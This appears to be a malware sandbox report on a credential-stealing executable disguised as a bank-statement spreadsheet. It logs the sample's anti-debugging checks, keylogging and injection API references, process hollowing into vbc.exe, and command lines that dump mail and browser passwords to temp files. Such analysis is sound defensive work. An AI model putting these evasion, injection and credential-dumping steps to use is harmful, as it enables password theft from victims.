                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00405AC0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00405AC0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00408900 FindFirstFileA,GetLastError,2_2_00408900
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00405AC0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,2_2_00405AC0
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00406EC3
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,7_2_00408441
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,7_2_00407E0E
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004206A4 GetSystemInfo,0_2_004206A4
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.775356177.0000000006E40000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.806976267.0000000006810000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.862199701.0000000006330000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.888847938.0000000006950000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912205260.000000000077B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllVV2
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.775356177.0000000006E40000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.806976267.0000000006810000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.862199701.0000000006330000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.888847938.0000000006950000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.775356177.0000000006E40000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.806976267.0000000006810000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.862199701.0000000006330000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.888847938.0000000006950000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.798729439.00000000008DA000.00000004.00000020.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.882848976.00000000007BD000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.775356177.0000000006E40000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.806976267.0000000006810000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.862199701.0000000006330000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.888847938.0000000006950000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugFlagsJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugObjectHandleJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugFlagsJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugObjectHandleJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugFlagsJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugObjectHandleJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugFlags
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugObjectHandle
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugFlags
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugObjectHandle
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugFlags
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugObjectHandle
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugFlags
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugObjectHandle
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugFlags
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugObjectHandle
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugFlags
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugObjectHandle
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugFlags
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugObjectHandle
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugFlags
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugObjectHandle
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugFlags
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess queried: DebugObjectHandle
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0048B6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0048B6F3
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,7_2_00408836
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004405C4 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,0_2_004405C4
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0048F412 mov eax, dword ptr fs:[00000030h]1_2_0048F412
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0048F4D0 mov eax, dword ptr fs:[00000030h]1_2_0048F4D0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0048B6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0048B6F3
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0048A746 SetUnhandledExceptionFilter,1_2_0048A746
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0048BBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0048BBB5
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0048DD7F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0048DD7F
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory protected: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                .NET source code references suspicious native API functionsShow sources
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Allocates memory in foreign processesShow sources
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                Maps a DLL or memory area into another processShow sources
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: unknown target: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: unknown target: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: unknown target: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: unknown target: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: unknown target: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: unknown target: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe protection: execute and read and write
                Sample uses process hollowing techniqueShow sources
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                Writes to foreign memory regionsShow sources
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2264Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2304Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2288
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2264
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2324
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: BANK-STATMENT _xlsx.exe, 00000027.00000002.929173429.0000000000C30000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: BANK-STATMENT _xlsx.exe, 00000027.00000002.929173429.0000000000C30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: BANK-STATMENT _xlsx.exe, 00000027.00000002.929173429.0000000000C30000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: BANK-STATMENT _xlsx.exe, 00000027.00000002.929173429.0000000000C30000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00405C78
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: GetLocaleInfoA,GetACP,0_2_0040AC84
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: GetLocaleInfoA,0_2_00409954
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: GetLocaleInfoA,0_2_00409908
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_00405D84
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: GetLocaleInfoA,1_2_0048EA4A
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,2_2_00405C78
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: GetLocaleInfoA,GetACP,2_2_0040AC84
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: GetLocaleInfoA,2_2_00409954
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: GetLocaleInfoA,2_2_00409908
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,2_2_00405D84
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
